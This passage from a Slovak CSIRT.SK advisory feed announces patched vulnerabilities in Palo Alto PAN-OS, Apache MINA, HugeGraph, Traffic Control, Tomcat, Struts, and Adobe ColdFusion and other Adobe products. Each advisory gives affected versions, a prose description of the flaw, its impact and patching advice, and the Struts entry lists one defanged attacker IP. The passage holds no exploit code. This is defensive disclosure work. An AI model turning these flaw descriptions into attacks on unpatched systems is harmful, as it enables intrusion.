					<wfw:commentRss>/posts/1861/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť v operačnom systéme Palo Alto PAN-OS</title>
		<link>/posts/1858</link>
					<comments>/posts/1858#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 31 Dec 2024 12:50:50 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[Palo Alto]]></category>
		<guid isPermaLink="false">/?p=1858</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v operačnom systéme PAN-OS. CVE-2024-3393 v komponente DNS...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/palo-alto-networks-inc-logo-vector.png" alt="" /></p>
<p><strong>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v operačnom systéme PAN-OS. CVE-2024-3393 v komponente DNS Security možno zaslaním špeciálne vytvorených paketov zneužiť na zneprístupnenie služby a&nbsp;vyradenie firewallov. Zraniteľnosť súčasnosti aktívne zneužívajú útočníci.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PAN-OS 11.2 vo verziách starších ako 11.2.3</li>



<li>PAN-OS 11.1 vo verziách starších ako 11.1.5</li>



<li>PAN-OS 10.2 vo verziách od 10.2.8 až po verzie&nbsp;staršie ako 10.2.14</li>



<li>PAN-OS 10.1 vo verziách od 10.1.14 až po verzie staršie ako 10.1.15</li>



<li>Prisma Access s&nbsp;PAN-OS vo verziách od 10.2.8 (vrátane)</li>



<li>Prisma Access s&nbsp;PAN-OS vo verziách starších ako 11.2.3</li>
</ul>



<p><em>Pozn.:</em></p>



<ul>
<li><em>Zraniteľnosť je možné zneužiť len na zariadeniach so zraniteľnými verziami PAN-OS, na ktorých sú súčasne aktivované funkcie „DNS Security Logging“ a&nbsp;jedna z&nbsp;funkcií „DNS Security License“ alebo „Advanced DNS Security License“</em></li>



<li><em>Cloud NGFW a&nbsp;zariadenia s&nbsp;PAN-OS 9.1 nie sú predmetnou zraniteľnosťou zasiahnuté</em></li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-3393 </strong>(CVSS skóre 8,7)</p>



<p>Vysoko závažnú zraniteľnosť v&nbsp;komponente DNS Security by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených DNS paketov mohol zneužiť na <strong>vyvolanie reštartu zariadenia</strong>. Pri jej opakovanom zneužití dochádza k <strong>prepnutiu zariadenia do „maintenance“ režimu</strong> a&nbsp;úplnému <strong>zneprístupneniu služby</strong>. <strong>Zraniteľnosť je v&nbsp;súčasnosti aktívne zneužívaná.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Zneprístupnenie služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Spoločnosť Palo Alto odporúča používať len produkty s platnou technickou podporou a bezodkladnú aktualizáciu zasiahnutých systémov aspoň na verzie PAN-OS 10.1.15, PAN-OS 10.2.14, PAN-OS 11.1.5, PAN-OS 11.2.3, resp ďalšie podverzie v&nbsp;zozname na <a href="https://security.paloaltonetworks.com/CVE-2024-3393">stránke výrobcu</a> v&nbsp;časti „Solution“.</p>



<p>Na systémoch, kde aktualizácia nie je možná, zraniteľnosť možno mitigovať úpravou konfigurácie DNS Security. Kompletný návod môžete nájsť na <a href="https://security.paloaltonetworks.com/CVE-2024-3393">stránke výrobcu</a> v&nbsp;časti „Workarounds and Mitigations“.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://security.paloaltonetworks.com/CVE-2024-3393">https://security.paloaltonetworks.com/CVE-2024-3393</a></li>



<li><a href="https://thehackernews.com/2024/12/palo-alto-releases-patch-for-pan-os-dos.html">https://thehackernews.com/2024/12/palo-alto-releases-patch-for-pan-os-dos.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1858/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v produktoch Apache MINA, HugeGraph-Server  a Traffic Control</title>
		<link>/posts/1855</link>
					<comments>/posts/1855#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 31 Dec 2024 12:49:51 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1855</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Apache.png" alt="" /></p>Vývojári z&#160;The Apache Software Foundation vydali bezpečnostné aktualizácie, ktoré opravujú kritické zraniteľnosti v produktoch Apache MINA, Apache HugeGraph-Server a Apache...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Apache.png" alt="" /></p>
<p><strong>Vývojári z&nbsp;The Apache Software Foundation vydali bezpečnostné aktualizácie, ktoré opravujú kritické zraniteľnosti v produktoch Apache MINA, Apache HugeGraph-Server a Apache Traffic Control. CVE-2024-52046 v sieťovom aplikačnom frameworku MINA možno zneužiť na vzdialené vykonanie škodlivého kódu. CVE-2024-43441 v Apache HugeGraph-Server umožňuje získanie úplnej kontroly nad systémom a CVE-2024-45387 (</strong><strong>Traffic Control) možno zneužiť na realizáciu SQL injekcie.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apache MINA 2.0.X vo verziách starších ako 2.0.27</li>



<li>Apache MINA 2.1.X vo verziách starších ako 2.1.10</li>



<li>Apache MINA 2.2.X vo verziách starších ako 2.2.4</li>



<li>Apache HugeGraph-Server vo verziách 1.0.X starších ako 1.5.0</li>



<li>Apache Traffic Control vo verziách 8.0.X starších ako 8.0.2</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Apache MINA:</u></strong></p>



<p><strong>CVE-2024-52046 </strong>(CVSS 4.0 skóre 10,0)</p>



<p>CVE-2024-52046 v sieťovom aplikačnom frameworku MINA spočíva v&nbsp;nezabezpečenej, resp. neošetrenej deserializácii objektov Java v rámci funkcie ObjectSerializationDecoder a možno ju zneužiť na <strong>vzdialené vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Apache HugeGraph-Server:</u></strong></p>



<p><strong>CVE-2024-43441 </strong>(CVSS skóre 9,8)</p>



<p>Apache HugeGraph-Server obsahuje zraniteľnosť s označením CVE-2024-43441, ktorú možno zneužiť na <strong>obídenie mechanizmov autentifikácie</strong> a <strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong><u>Apache Traffic Control:</u></strong></p>



<p><strong>CVE-2024-45387 </strong>(CVSS skóre 9,9)</p>



<p>Traffic Ops obsahuje zraniteľnosť, ktorú by vzdialený autentifikovaný útočník s&nbsp;opráveniami úrovne „admin“, „federation“, „operations“, „portal“ alebo „steering“ mohol zaslaním špeciálne vytvorených požiadaviek HTTP PUT zneužiť na realizáciu <strong>SQL injekcie</strong> s&nbsp;následkom <strong>úplného narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie mechanizmov autentifikácie</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Apache MINA, Apache HugeGraph-Server a Apache Traffic Control na verzie špecifikované v&nbsp;časti „Zraniteľné systémy“ tohto varovania.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-52046">https://nvd.nist.gov/vuln/detail/CVE-2024-52046</a></li>



<li><a href="https://lists.apache.org/thread/4wxktgjpggdbto15d515wdctohb0qmv8">https://lists.apache.org/thread/4wxktgjpggdbto15d515wdctohb0qmv8</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-43441">https://nvd.nist.gov/vuln/detail/CVE-2024-43441</a></li>



<li><a href="https://lists.apache.org/thread/h2607yv32wgcrywov960jpxhvsmmlf12">https://lists.apache.org/thread/h2607yv32wgcrywov960jpxhvsmmlf12</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45387">https://nvd.nist.gov/vuln/detail/CVE-2024-45387</a></li>



<li><a href="https://lists.apache.org/thread/t38nk5n7t8w3pb66z7z4pqfzt4443trr">https://lists.apache.org/thread/t38nk5n7t8w3pb66z7z4pqfzt4443trr</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1855/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v produktoch Adobe ColdFusion</title>
		<link>/posts/1853</link>
					<comments>/posts/1853#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 31 Dec 2024 12:44:34 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[ColdFusion]]></category>
		<category><![CDATA[information disclosure]]></category>
		<guid isPermaLink="false">/?p=1853</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte Adobe ColdFusion. CVE-2024-53961 možno zneužiť na získanie neoprávneného prístupu...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte Adobe ColdFusion. CVE-2024-53961 možno zneužiť na získanie neoprávneného prístupu k&nbsp;citlivým údajom, ktoré možno následne zneužiť na realizáciu ďalších útokov a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe ColdFusion 2023 vo verziách starších ako Update 12</li>



<li>Adobe ColdFusion 2021 vo verziách starších ako Update 18</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-53961 </strong>(CVSS skóre 7,4)</p>



<p>Kritickú zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť na čítanie obsahu ľubovoľných súborov na súborovom systéme zraniteľných serverov, čím môže získať <strong>neoprávnený prístup k citlivým údajom</strong>.Na zraniteľnosť je v súčasnosti <strong>dostupný aj proof-of-concept</strong> kód demonštrujúci postup pre jej zneužitie a možno očakávať pokusy o jej aktívne zneužívanie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie Adobe ColdFusion 2023 Update 12 a Adobe ColdFusion 2021 Update 18<strong>.</strong></p>



<p>Adobe zároveň odporúča aplikovať konfiguráciu podľa svojich návodov pre <a href="https://www.adobe.com/content/dam/cc/us/en/products/coldfusion/pdfs/cf-starter-kits/coldfusion-2023-lockdown-guide-1.1.pdf" target="_blank" rel="noreferrer noopener">ColdFusion 2023</a> a <a href="https://www.adobe.com/content/dam/cc/us/en/products/coldfusion/pdfs/cf-starter-kits/coldfusion-2021-lockdown-guide-1.1.pdf" target="_blank" rel="noreferrer noopener">ColdFusion 2021</a>.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/coldfusion/apsb24-107.html">https://helpx.adobe.com/security/products/coldfusion/apsb24-107.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/adobe-warns-of-critical-coldfusion-bug-with-poc-exploit-code/">https://www.bleepingcomputer.com/news/security/adobe-warns-of-critical-coldfusion-bug-with-poc-exploit-code/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1853/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť vo webových serveroch Apache Tomcat</title>
		<link>/posts/1849</link>
					<comments>/posts/1849#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 20 Dec 2024 14:26:21 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apache Tomcat]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1849</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Apache_Tomcat_Logo-1024x712.png" alt="" /></p>Vývojári open-source webového servera Apache Tomcat vydali bezpečnostné aktualizácie opravujúce 2 zraniteľnosti, z&#160;ktorých jedna je označená ako kritická. CVE-2024-50379 by...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Apache_Tomcat_Logo-1024x712.png" alt="" /></p>
<p><strong>Vývojári open-source webového servera Apache Tomcat vydali bezpečnostné aktualizácie opravujúce 2 zraniteľnosti, z&nbsp;ktorých jedna je označená ako kritická. CVE-2024-50379 by vzdialený neautentifikovaný útočník mohol zneužiť na&nbsp;vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apache Tomcat 11.0.X vo verziách starších ako 11.0.2</li>



<li>Apache Tomcat 10.1.X vo verziách starších ako 10.1.34</li>



<li>Apache Tomcat 9.0.X vo verziách starších ako 9.0.98</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-50379 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;TOCTOU (Time-of-Check Time-of-Use) súbehu procesov počas JSP kompilácie. CVE-2024-50379 by vzdialený neautentifikovaný útočník nahraním špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie kódu a&nbsp;úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému.<em></em></p>



<p>Zraniteľnosť je možné zneužiť len na súborových systémoch nerozlišujúcich malé a&nbsp;veľké písmená v&nbsp;názvoch súborov (tzv. case insensitive file systems), pokiaľ je v&nbsp;Default servlete parameter pre zákaz zápisu nastavený na hodnotu False, teda kde je povolený zápis.</p>



<p><strong>CVE-2024-54677 </strong>(CVSS skóre 5,3)</p>



<p>Zraniteľnosť vo vzorových webových aplikáciách obsiahnutých v&nbsp;rámci inštalácií Apache Tomcat spočívajú v&nbsp;absencii limitov pre celkovú veľkosť nahrávaných súborov. Vzdialený neautentifikovaný útočník by ich mohol zneužiť na zahltenie pamäte a zneprístupnenie služby.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zraniteľných inštancií Apache Tomcat aspoň na verzie</p>



<ul>
<li>Apache Tomcat 11.0.2</li>



<li>Apache Tomcat 10.1.34</li>



<li>Apache Tomcat 9.0.98</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r">https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r</a></li>



<li><a href="https://lists.apache.org/thread/tdtbbxpg5trdwc2wnopcth9ccvdftq2n">https://lists.apache.org/thread/tdtbbxpg5trdwc2wnopcth9ccvdftq2n</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-50379">https://nvd.nist.gov/vuln/detail/CVE-2024-50379</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-54677">https://nvd.nist.gov/vuln/detail/CVE-2024-54677</a></li>



<li><a href="https://securityonline.info/rce-and-dos-vulnerabilities-addressed-in-apache-tomcat-cve-2024-50379-and-cve-2024-54677">https://securityonline.info/rce-and-dos-vulnerabilities-addressed-in-apache-tomcat-cve-2024-50379-and-cve-2024-54677</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1849/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť vo frameworku Apache Struts</title>
		<link>/posts/1846</link>
					<comments>/posts/1846#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 20 Dec 2024 14:22:15 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Apache Struts]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1846</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Apache_Struts_2_logo.svg_-1024x572.png" alt="" /></p>Vývojári open-source frameworku pre tvorbu Java EE webových aplikácií Apache Struts vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Apache_Struts_2_logo.svg_-1024x572.png" alt="" /></p>
<p><strong>Vývojári open-source frameworku pre tvorbu Java EE webových aplikácií Apache Struts vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2024-53677 možno zneužiť na upload súborov a&nbsp;vzdialené vykonanie kódu. Na uvedenú zraniteľnosť je v súčasnosti dostupný proof-of-concept kód demonštrujúci postup jej zneužitia</strong><strong>.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apache Struts vo verziách 2.0.0 až 2.3.37 (ukončená technická podpora)</li>



<li>Apache Struts vo verziách 2.5.0 až 2.5.33 (ukončená technická podpora)</li>



<li>Apache Struts vo verziách 6.0.0 až 6.3.0.2</li>
</ul>



<p><em>Pozn.: Zraniteľnosť je možné zneužiť len v&nbsp;rámci aplikácií, ktoré využívajú <a href="https://struts.apache.org/core-developers/file-upload-interceptor">FileUploadInterceptor</a></em><em></em></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2024-53677 </strong>(CVSS 4.0 skóre 9,5)</p>



<p>Bližšie nešpecifikovanú chybu v&nbsp;logike pre nahrávanie súborov by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených POST požiadaviek mohol zneužiť na <strong>nahratie škodlivých súborov</strong> a <strong>vzdialené vykonanie kódu</strong>. CVE-2024-53677 je v súčasnosti <strong>aktívne zneužívaná</strong> útočníkmi a&nbsp;je dostupný proof-of-concept kód demonštrujúci postup jej zneužitia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnená zmena v&nbsp;systéme</strong></li>
</ul>



<p><strong>Indikátory kompromitácie:</strong></p>



<ul>
<li>169.150.226[.]162</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Výrobca odporúča bezodkladnú aktualizáciu Apache Struts na verziu 6.4.0 alebo novšiu. Odstránenie zraniteľnosti okrem samotnej aktualizácie frameworku vyžaduje aj úpravu zdrojového kódu aplikácií, aby začali využívať <a href="https://struts.apache.org/core-developers/file-upload">nový mechanizmus pre nahrávanie súborov</a>.</p>



<p>Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie v&nbsp;logoch sieťových a bezpečnostných prvkov a&nbsp;ich blokovanie.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://cwiki.apache.org/confluence/display/WW/S2-067">https://cwiki.apache.org/confluence/display/WW/S2-067</a></li>



<li><a href="https://isc.sans.edu/diary/31520">https://isc.sans.edu/diary/31520</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-53677">https://nvd.nist.gov/vuln/detail/CVE-2024-53677</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/new-critical-apache-struts-flaw-exploited-to-find-vulnerable-servers/">https://www.bleepingcomputer.com/news/security/new-critical-apache-struts-flaw-exploited-to-find-vulnerable-servers/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1846/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – november 2024</title>
		<link>/posts/1807</link>
					<comments>/posts/1807#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 13 Dec 2024 10:11:17 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=1807</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci november 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci november 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/01/MS202411.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/MS202411.pdf">Mesačná správa – 11/2024 PDF (1 838 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/1807/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické bezpečnostné zraniteľnosti v produktoch Adobe</title>
		<link>/posts/1833</link>
					<comments>/posts/1833#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Dec 2024 14:05:27 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Adobe]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=1833</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>Spoločnosť Adobe vydala bezpečnostné aktualizácie svojich produktov Adobe Experience Manager, Acrobat, Reader, Media Encoder, Illustrator, After Effects, Animate, InDesign, PDFL...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/09/Adobe.png" alt="" /></p>
<p><strong>Spoločnosť Adobe vydala bezpečnostné aktualizácie svojich produktov Adobe Experience Manager, Acrobat, Reader, Media Encoder, Illustrator, After Effects, Animate, InDesign, PDFL Software Development Kit (SDK), Connect, Substance 3D Sampler, Photoshop, Substance 3D Modeler, Bridge, Premiere Pro, Substance 3D Painter a FrameMaker, ktoré opravujú 165 zraniteľností, z&nbsp;čoho 45 sú označené ako kritické. Kritické zraniteľnosti by vzdialený neautentifikovaný útočník prostredníctvom podvrhnutia špeciálne vytvorených súborov mohol zneužiť na vykonanie škodlivého kódu, eskaláciu privilégií a&nbsp;získanie neoprávneného prístupu k&nbsp;citlivým údajom. Ostatné zraniteľnosti umožňujú vykonanie škodlivého kódu, získanie neoprávneného prístupu k citlivým údajom, obídenie bezpečnostných prvkov a zneprístupnenie služby.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Adobe Experience Manager (AEM) vo verziách starších ako AEM Cloud Service Release 2024.11</li>



<li>Adobe Experience Manager (AEM) vo verziách starších ako 6.5.22</li>



<li>Acrobat DC vo verziách starších ako 24.005.20320</li>



<li>Acrobat Reader DC vo verziách starších ako 24.005.20320</li>



<li>Acrobat 2024 vo verziách starších ako 24.001.30225</li>



<li>Acrobat 2020 vo verziách starších ako 20.005.30748</li>



<li>Acrobat Reader 2020 vo verziách starších ako 20.005.30748</li>



<li>Adobe Media Encoder vo verziách starších ako 24.6.4</li>



<li>Adobe Media Encoder vo verziách starších ako 25.1</li>



<li>Illustrator 2025 vo verziách starších ako 29.1</li>



<li>Illustrator 2024 vo verziách starších ako 28.7.3</li>



<li>Adobe After Effects vo verziách starších ako 24.6.3</li>



<li>Adobe After Effects vo verziách starších ako 25.1</li>



<li>Adobe Animate  2023 vo verziách starších ako 23.0.9</li>



<li>Adobe Animate  2024 vo verziách starších ako 24.0.6</li>



<li>Adobe InDesign vo verziách starších ako ID20.0</li>



<li>Adobe InDesign vo verziách starších ako ID19.5.1</li>



<li>Adobe PDFL Software Development Kit (SDK) vo verziách starších ako 21.0.0.7</li>



<li>Adobe Connect vo verziách starších ako 12.7</li>



<li>Adobe Connect vo verziách starších ako 11.4.9</li>



<li>Adobe Substance 3D Sampler vo verziách starších ako 4.5.2</li>



<li>Photoshop 2025 vo verziách starších ako 26.1</li>



<li>Adobe Substance 3D Modeler vo verziách starších ako 1.15.0</li>



<li>Adobe Bridge vo verziách starších ako 14.1.4</li>



<li>Adobe Bridge vo verziách starších ako 15.0.1</li>



<li>Adobe Premiere Pro vo verziách starších ako 25.1</li>



<li>Adobe Premiere Pro vo verziách starších ako 24.6.4</li>



<li>Adobe Substance 3D Painter vo verziách starších ako 10.1.2</li>



<li>Adobe FrameMaker 2020 vo verziách starších ako Release Update 7 bez aktualizácie DLL</li>



<li>Adobe FrameMaker 2022 vo verziách starších ako Release Update 5 bez aktualizácie DLL</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Adobe Experience Manager:</u></strong></p>



<p><strong>CVE-2024-43711 </strong>(CVSS skóre 7,1)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;nedostatočnom overovaní vstupov a&nbsp;vzdialený útočník by ju mohol zneužiť na vzdialené vykonanie kódu.</p>



<p><strong><u>Adobe Acrobat, Adobe Reader:</u></strong></p>



<p><strong>CVE-2024-49530 </strong>(CVSS skóre 7,8), <strong>CVE-2024-49535</strong> (CVSS skóre 6,3)</p>



<p>Zraniteľnosti spočívajúce v&nbsp;použití odalokovaného miesta v&nbsp;pamäti (CVE-2024-49530) a&nbsp;nesprávnej reštrikcii XML External Entity referencií (CVE-2024-49535) možno zneužiť na vykonanie škodlivého kódu.</p>



<p><strong><u>Adobe Media Encoder:</u></strong></p>



<p><strong>CVE-2024-49551, CVE-2024-49552, CVE-2024-49553 </strong>(CVSS skóre 7,8)</p>



<p>Zápis mimo povolených hodnôt (CVE-2024-49551, CVE-2024-49553) a&nbsp;pretečenie medzipamäte haldy (CVE-2024-49552) v&nbsp;rámci produktu Adobe Media Encoder umožňujú vykonanie škodlivého kódu.</p>



<p><strong><u>Adobe Illustrator:</u></strong></p>



<p><strong>CVE-2024-49538, CVE-2024-49541 </strong>(CVSS skóre 7,8)</p>



<p>Uvedené zraniteľnosti spočívajú v&nbsp;zápise do pamäte mimo povodených hodnôt a&nbsp;umožňujú vykonanie škodlivého kódu.</p>



<p><strong><u>Adobe After Effects:</u></strong></p>



<p><strong>CVE-2024-49537 </strong>(CVSS skóre 7,8)</p>



<p>Pretečenie vyrovnávacej pamäte zásobníka možno zneužiť na získanie neoprávneného prístupu k&nbsp;obsahu pamäte a&nbsp;úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému.</p>



<p><strong><u>Adobe Animate:</u></strong></p>



<p><strong>CVE-2024-52982, CVE-2024-52983, CVE-2024-52984, CVE-2024-52985, CVE-2024-52986, CVE-2024-52987, CVE-2024-52988, CVE-2024-52989, CVE-2024-52990, CVE-2024-45155, CVE-2024-45156, CVE-2024-53953, CVE-2024-53954</strong> (CVSS skóre 7,8)</p>



<p>Kritické zraniteľnosti umožňujúce vykonanie škodlivého kódu spočívajú v&nbsp;nesprávnom overovaní vstupov (CVE-2024-52982), pretečení celočíselnej premennej (CVE-2024-52983), podtečení celočíselnej premennej (CVE-2024-52984, CVE-2024-52985, CVE-2024-52986, CVE-2024-52987, CVE-2024-52989, CVE-2024-53954), zápise do pamäte mimo povolených hodnôt (CVE-2024-52988), podtečení zásobníka (CVE-2024-52990), prístupe k&nbsp;neinicializovanému pointeru (CVE-2024-45155), dereferencii nulového ukazovateľa (CVE-2024-45156) a použití odalokovaného miesta v&nbsp;pamäti (CVE-2024-53953).</p>



<p><strong><u>Adobe InDesign:</u></strong></p>



<p><strong>CVE-2024-49543, CVE-2024-49545 </strong>(CVSS skóre 7,8)</p>



